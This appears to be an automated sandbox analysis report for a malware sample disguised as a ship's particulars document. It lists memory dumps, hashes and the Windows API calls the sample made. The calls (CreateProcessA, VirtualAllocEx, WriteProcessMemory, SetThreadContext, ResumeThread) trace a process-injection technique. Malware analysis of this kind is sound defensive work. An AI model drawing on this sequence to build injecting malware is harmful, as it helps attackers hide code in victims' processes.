                                                                                                                  • Opcode Fuzzy Hash: d67d28bda6334e750d75f1e6b842edbee4ba458d32d29495cbd952f13cb384f4
                                                                                                                  • Instruction Fuzzy Hash: BA915971D11219DFDF64CF68CC45BAEBBB2BF48310F1485A9E808A7240DB749A85CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph: basic blocks 6c97a40-6c97d85 (graph rendering not recoverable from the extracted text); calls CreateProcessA.
                                                                                                                  APIs
                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C97C76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: 6df8ad4378240b7f30fd8c8d4efd55fa9cb0f0f20bb82a6b48ebbde69be8b893
                                                                                                                  • Instruction ID: e5829cd79bfb0d5860020b19437df647d02d6a64c65fa24e3939a164442652c6
                                                                                                                  • Opcode Fuzzy Hash: 6df8ad4378240b7f30fd8c8d4efd55fa9cb0f0f20bb82a6b48ebbde69be8b893
                                                                                                                  • Instruction Fuzzy Hash: 8F915871D11219DFDF64CF68C845BAEBBB2BF48314F1485A9E808A7240DB749A85CFA1

Control-flow Graph: [rendered graph (executed / not executed colouring) not recoverable in text; basic blocks span b558ec-b55a41, block b558ec-b559b9 calls CreateActCtxA]
APIs
• CreateActCtxA.KERNEL32(?), ref: 00B559A9
Memory Dump Source
• Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 3bf08fa6a2b6c09582e9c583f97b55b0dba9848206a503dcf1eb4d9045590587
• Instruction ID: 32099ae47d3c576d410e397eaa8dd7c8b000433c1df5a49ff7eecea7478407c6
• Opcode Fuzzy Hash: 3bf08fa6a2b6c09582e9c583f97b55b0dba9848206a503dcf1eb4d9045590587
• Instruction Fuzzy Hash: B641E2B0C00619CFDB24CFA9C984BDEBBB5FF88305F20819AD458AB251DB756949CF50

Control-flow Graph: [rendered graph (executed / not executed colouring) not recoverable in text; basic blocks span b544b4-b55a41, block b544b4-b559b9 calls CreateActCtxA]
APIs
• CreateActCtxA.KERNEL32(?), ref: 00B559A9
Memory Dump Source
• Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: ab85a0787d4ae8c2869f4ecb3bdb1a9508eec7640cabefca85714421d6fcf6e8
• Instruction ID: fc48009518c8608f86dfd1bb39da7b4d9935357563e40f6ea8dbafc57d68c32a
• Opcode Fuzzy Hash: ab85a0787d4ae8c2869f4ecb3bdb1a9508eec7640cabefca85714421d6fcf6e8
• Instruction Fuzzy Hash: 6141D3B0C00719CBDB24DFA9C984B8EBBF5FF48305F20819AD418AB251DB756949CF90

Control-flow Graph: [rendered graph (executed / not executed colouring) not recoverable in text; basic blocks span 6c977b0-6c9788e, block 6c97816-6c97855 calls WriteProcessMemory]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C97848
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 87d9eb4f36c97c1630e383054a9ed45e38d4c963011da4167d1618be640bd0d6
• Instruction ID: f85ee72452751640597cc27c8a9589be08cb3dac857e2e3910bba376ae615067
• Opcode Fuzzy Hash: 87d9eb4f36c97c1630e383054a9ed45e38d4c963011da4167d1618be640bd0d6
• Instruction Fuzzy Hash: D02124B19003499FDB10CFAAC885BDEBBF5FB48320F10842AE958A7240D7789940DBA4

Control-flow Graph: [rendered graph (executed / not executed colouring) not recoverable in text; basic blocks span 6c977b8-6c9788e, block 6c97816-6c97855 calls WriteProcessMemory]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C97848
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: fa1657b9bb28a21178f9805a4489dde0df1f1fa2eafcc77203313aadb4b6d55c
• Instruction ID: 937143043d83e8fa287fbf8541657ed8b8eb9cbcc0b5602c1399e8ce222baa6e
• Opcode Fuzzy Hash: fa1657b9bb28a21178f9805a4489dde0df1f1fa2eafcc77203313aadb4b6d55c
• Instruction Fuzzy Hash: DD2113B19003499FCB14CFAAC985BDEBBF5FF48320F10842AE958A7240D7789940DBA5

Control-flow Graph: [rendered graph (executed / not executed colouring) not recoverable in text; basic blocks span b5d5e8-b5d6aa, block b5d5e8-b5d684 calls DuplicateHandle]
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
Memory Dump Source
• Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 1b07fdd75a58e5dcb895058f61e66cd19046a0be520d1e01e452a664dbfd76a3
• Instruction ID: c63fd10140d4d1cf4cec8ec48badb327bb7e24fe8117e3d0d12ed633a0c5e403
• Opcode Fuzzy Hash: 1b07fdd75a58e5dcb895058f61e66cd19046a0be520d1e01e452a664dbfd76a3
• Instruction Fuzzy Hash: A521D6B59002489FDB10CFAAD985ADEBFF5FB48320F14815AE958A3310C3799945CF60
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9769E
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 0bdfdf7cee774334a3dc046cf343b52323eb9afac5b910e805781bbef4507993
• Instruction ID: c5ecf4c99f885fcc812b61f7781d1c5cd6e72508097d35c88ca4d0dd1d87caf2
• Opcode Fuzzy Hash: 0bdfdf7cee774334a3dc046cf343b52323eb9afac5b910e805781bbef4507993
• Instruction Fuzzy Hash: 7B2139B1D103098FDB10CFAAC8857AEBBF5EF88324F14842AD559A7280D7789945CBA1
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C97928
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 69ec8e886b4f9aa21f70400b54fcd785ccd323fcdcd9dc09b58ba6e474586a13
• Instruction ID: cd231f8db9a7245a73cf1e06cb14cc6814f1a9fcb768287ec4443ef8ecb30b5d
• Opcode Fuzzy Hash: 69ec8e886b4f9aa21f70400b54fcd785ccd323fcdcd9dc09b58ba6e474586a13
• Instruction Fuzzy Hash: DB2148B1D003499FDF10CFAAC885ADEBBF5FF48320F14842AE559A7250D7789940DBA0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9769E
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 8de09e3df252a3438bb66dbfd5952e6187b6e1e2da117cf140f53267b4021c22
• Instruction ID: 79d49fee2c390f78fb3706fa20cd86d87479eaa0c1883ba560c247ed0ede882b
• Opcode Fuzzy Hash: 8de09e3df252a3438bb66dbfd5952e6187b6e1e2da117cf140f53267b4021c22
• Instruction Fuzzy Hash: FB2138B1D103098FDB10CFAAC8857AEBBF4EF88324F14842AD459A7240D7789944CFA1
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C97928
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: ad23debdc802f751732143a337104261c0befd165f778cfdad90a2865d1da009
• Instruction ID: aa43c773d7d16543c379e29c87381d8e7c4145783b8bc9dac4e60a6e2cc5ce05
• Opcode Fuzzy Hash: ad23debdc802f751732143a337104261c0befd165f778cfdad90a2865d1da009
• Instruction Fuzzy Hash: CA2128B1D003499FCB10DFAAC885ADEBBF5FF48320F10842AE558A7250D7789540DBA1
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
Memory Dump Source
• Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 198f66ac84f9024fb871a251cb6a1545b82711f134e7ec8bbff28cde307864aa
• Instruction ID: 48d98350c5fcfe0d48ce1b852e95bd3b64418ef43cbb54904210132b5ae01e0b
• Opcode Fuzzy Hash: 198f66ac84f9024fb871a251cb6a1545b82711f134e7ec8bbff28cde307864aa
• Instruction Fuzzy Hash: 8121E4B5900248DFDB10CF9AD984ADEBBF9FB48320F14805AE918A3310C374A944CFA4
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C97766
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: ceffd3ec1789d7450aaa1813d4825a07bf18e0caf96a16144b6158b119e912ef
• Instruction ID: 2603bf2d399471cb043b0462116f61f46fc441ef0b462b91770203f8d5232889
• Opcode Fuzzy Hash: ceffd3ec1789d7450aaa1813d4825a07bf18e0caf96a16144b6158b119e912ef
• Instruction Fuzzy Hash: E51167B29003499FDF10DFAAC845ADEBFF9EF88320F208419E519A7250C775A540DFA1
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C97766
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 44681ac7564e8de0d37ac3a924ac407aa1c7b5497533f66f58ddd2b35a9d5a31
• Instruction ID: 3f384e7e2e616d3eb1b27c30c5fda9658c0c726040e29e38be31bcb93264ee20
• Opcode Fuzzy Hash: 44681ac7564e8de0d37ac3a924ac407aa1c7b5497533f66f58ddd2b35a9d5a31
• Instruction Fuzzy Hash: CC1137B19003499FCF10DFAAC845ADEBFF9EF88324F248419E519A7250C775A540DFA1
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ResumeThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 947044025-0
                                                                                                                  • Opcode ID: 48504c27e6f371be883c135db01a7277de45ba80bdb9a09f5d8ca7c6438455dd
                                                                                                                  • Instruction ID: e5ee8870fd85716ab4ad08c471bcebfb4d2e67768025b5c2fc9856fd74b7ace3
                                                                                                                  • Opcode Fuzzy Hash: 48504c27e6f371be883c135db01a7277de45ba80bdb9a09f5d8ca7c6438455dd
                                                                                                                  • Instruction Fuzzy Hash: 961158B1D003498FDB20DFAAC8457DEFFF5EB88324F208419D459A7250C775A941CBA4
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ResumeThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 947044025-0
                                                                                                                  • Opcode ID: 5ed3bb9bf942c1d1ea64c11aee843c74fa9b4fdd811b8602ac7b700c796f319d
                                                                                                                  • Instruction ID: 5cd3f388578816f5878717dc42633dbcb56e194ca787ab2aada5a13bbeb66c5c
                                                                                                                  • Opcode Fuzzy Hash: 5ed3bb9bf942c1d1ea64c11aee843c74fa9b4fdd811b8602ac7b700c796f319d
                                                                                                                  • Instruction Fuzzy Hash: AA113AB1D003498FDB20DFAAC84579EFBF5EF88324F248419D559A7250C775A540CBA5
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C9A305
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 410705778-0
                                                                                                                  • Opcode ID: 62272f78a38c806665c3542349be63110caf7a68b0abc0d2234b4ca5935c6cfd
                                                                                                                  • Instruction ID: 55ec1b512fa9a89e2aaadbf90a280541926ccc20431d5388384b97aaee3facee
                                                                                                                  • Opcode Fuzzy Hash: 62272f78a38c806665c3542349be63110caf7a68b0abc0d2234b4ca5935c6cfd
                                                                                                                  • Instruction Fuzzy Hash: 0F11F2B5800749DFDB50DF9AC889BDEBBF8FB48324F20841AE558A7200C375A944CFA1
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5AF5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: f1d8b7f1a91d0de3b909936c46adb1a707a4a98d5adbe554666a15a8e3a64f5b
                                                                                                                  • Instruction ID: d8b28fa042fee9c604f72bb7dc0d0fa231cb4fbce62be69bcddb12a9d2feb069
                                                                                                                  • Opcode Fuzzy Hash: f1d8b7f1a91d0de3b909936c46adb1a707a4a98d5adbe554666a15a8e3a64f5b
                                                                                                                  • Instruction Fuzzy Hash: 9C11D2B5C003498FCB10CF9AD844B9EFBF5EB88324F14855AD859B7610C379A545CFA1
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C9A305
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 410705778-0
                                                                                                                  • Opcode ID: 62f29d9e4d5bcb588d054f9d01688dd72200645e3a58d304169fd1a5df2b55d8
                                                                                                                  • Instruction ID: 75f1fcc3ee8df83fa7f9fd6dbe40b069d940d2e8cea8fa1cbde646693479e039
                                                                                                                  • Opcode Fuzzy Hash: 62f29d9e4d5bcb588d054f9d01688dd72200645e3a58d304169fd1a5df2b55d8
                                                                                                                  • Instruction Fuzzy Hash: 8411B0B58003599FDB20CF9AD989BDEBBF8FB48324F20841AE558A7610D375A544CFA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8664e49143cb3dd8962283244430a742da5077fb80b9392ac31e93fb010effdc
                                                                                                                  • Instruction ID: bfc66cc4a8a54600bf29607c2b986c555e5a6e4ca681e8f85c1d35dad47089a0
                                                                                                                  • Opcode Fuzzy Hash: 8664e49143cb3dd8962283244430a742da5077fb80b9392ac31e93fb010effdc
                                                                                                                  • Instruction Fuzzy Hash: 842125B1504248EFCB15DF14D9C0B36BF67FB98318F24C569EA090B256C336E856DBA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 75dc6ba846f2ca903fea38c11908c64a9a547f899885628c784ab15981fcb180
                                                                                                                  • Instruction ID: f04779e21757d583b7aa1ed7dd36f188964639b437c6a76818cd016f9ebecda5
                                                                                                                  • Opcode Fuzzy Hash: 75dc6ba846f2ca903fea38c11908c64a9a547f899885628c784ab15981fcb180
                                                                                                                  • Instruction Fuzzy Hash: 872106B1504208DFDB05DF14D9C0B26BFA7FB94324F24C569EA094B256C336F856DAA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e7b8b7757dc1966c4b97c39f98e30b811207188c9003f5f75eba87bdd7e9d358
                                                                                                                  • Instruction ID: 524c74c24c3890fc12073e09c88f7548e7294763974dd6c13b7f0c83fccb87a7
                                                                                                                  • Opcode Fuzzy Hash: e7b8b7757dc1966c4b97c39f98e30b811207188c9003f5f75eba87bdd7e9d358
                                                                                                                  • Instruction Fuzzy Hash: 582104B1504304EFDB25DF94D9C0B26BBA5FB88314F24CA6DE9094B296C73ADC46CA61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bd657e51b4bd4eb58b3f0960cc9019ec727a742f3b94693e7af2b0518bd84be2
                                                                                                                  • Instruction ID: 230fa7a92e485be263b3b998bee7da2d2b6b2443133228b4851a08ecafb3a7ec
                                                                                                                  • Opcode Fuzzy Hash: bd657e51b4bd4eb58b3f0960cc9019ec727a742f3b94693e7af2b0518bd84be2
                                                                                                                  • Instruction Fuzzy Hash: A42103B1604300DFCB24DF54D9C0B26BBA5EB84314F20C669D80E4B286C33ADC07CA61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction ID: e2024f5c750c1d382edcf6973ce5b0ef6373fdb3eafd4c986acdc03aeacb9be7
                                                                                                                  • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction Fuzzy Hash: BB11E172404284CFCB12CF10D5C0B66BF72FB94318F24C6A9D9090B656C33AE85ACBA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction ID: a0a2abd48655004998d06dde9401985c244e3375247af21d75c00ba0879788d1
                                                                                                                  • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction Fuzzy Hash: 9E11E172404244DFCB12CF00D5C0B66BFB2FB94324F24C2A9D9090B756C33AE85ACBA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction ID: f120386f361327e352859fa25ba99cab07187ac89d60c6af13b59228e033c6bd
                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction Fuzzy Hash: 6E11DD75504380CFCB21CF54D5C4B15FBA2FB88318F24C6AAD80D4B696C33AD84ACBA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction ID: 1ea357480cc85f1d02c90983a8a67497d9d101e9975a4f15a18ecda1c249dcd7
                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction Fuzzy Hash: 3C11BB75504380DFCB22CF54C5C0B15BBA2FB84324F24C6AAD8494B696C33AD84ACB61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6e070664fde26e432d6b8d1c87dca59e957e49438f153049aa3214e800c90ac8
• Instruction ID: c5034a408d21d317fedd180a398e74da3da9c328e86bb2c0815130a9c8e248a3
• Opcode Fuzzy Hash: 6e070664fde26e432d6b8d1c87dca59e957e49438f153049aa3214e800c90ac8
• Instruction Fuzzy Hash: 6401DB710093489AE7106B25DCC4B76FFEADF51324F18C91AEE094E396C779A841D6B1
Memory Dump Source
• Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82dfda9b69522adc11ac5114ca6a1d95da4d32e2c44b56bb4b1b69dcc837c111
• Instruction ID: a487177e7c96a8975ce46dadc1e84b5a8bdd8377c76ca2d31118935a58fb8c05
• Opcode Fuzzy Hash: 82dfda9b69522adc11ac5114ca6a1d95da4d32e2c44b56bb4b1b69dcc837c111
• Instruction Fuzzy Hash: 7DF062724053449EE7209A16DDC4B62FFE9EF51724F18C45AEE484E396C379A844CAB1
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41251caaec75ae33bb4a07a39a725529a59af2be15f9a7e7effa34e1ce213205
• Instruction ID: 0557083e654295d99f039952f1c1e28148c813c7a4ab5feda1cdb392a7f643eb
• Opcode Fuzzy Hash: 41251caaec75ae33bb4a07a39a725529a59af2be15f9a7e7effa34e1ce213205
• Instruction Fuzzy Hash: 58E1F874E102598FDB54DFA9C5849AEFBF2FF89304F248169D814AB355D730A982CFA0
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c00782a24e67590ef4b012b5e5b6f8cfdf5d0470a6c2214af31472bbce8ee5ba
• Instruction ID: 43fed4948fa39691b8c854ef2e8061dcf85f37e08a32c96d300e6e655775568d
• Opcode Fuzzy Hash: c00782a24e67590ef4b012b5e5b6f8cfdf5d0470a6c2214af31472bbce8ee5ba
• Instruction Fuzzy Hash: EAE11B74E101198FDB54DFA9C5849AEFBF2FF89304F648169D814AB355DB30A982CFA0
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5af4eeb8c7243230e371eede86c3830c5681ef1310bae562ac36269b9ab01c45
• Instruction ID: 12fe0b095e7ee6c42c33f6b1423e5e996b93a9518c4c0962108debed36e86b91
• Opcode Fuzzy Hash: 5af4eeb8c7243230e371eede86c3830c5681ef1310bae562ac36269b9ab01c45
• Instruction Fuzzy Hash: 9DE10974E111198FDB54DFA9C5849AEFBF2FF89304F248169D814AB356D730A982CFA0
Memory Dump Source
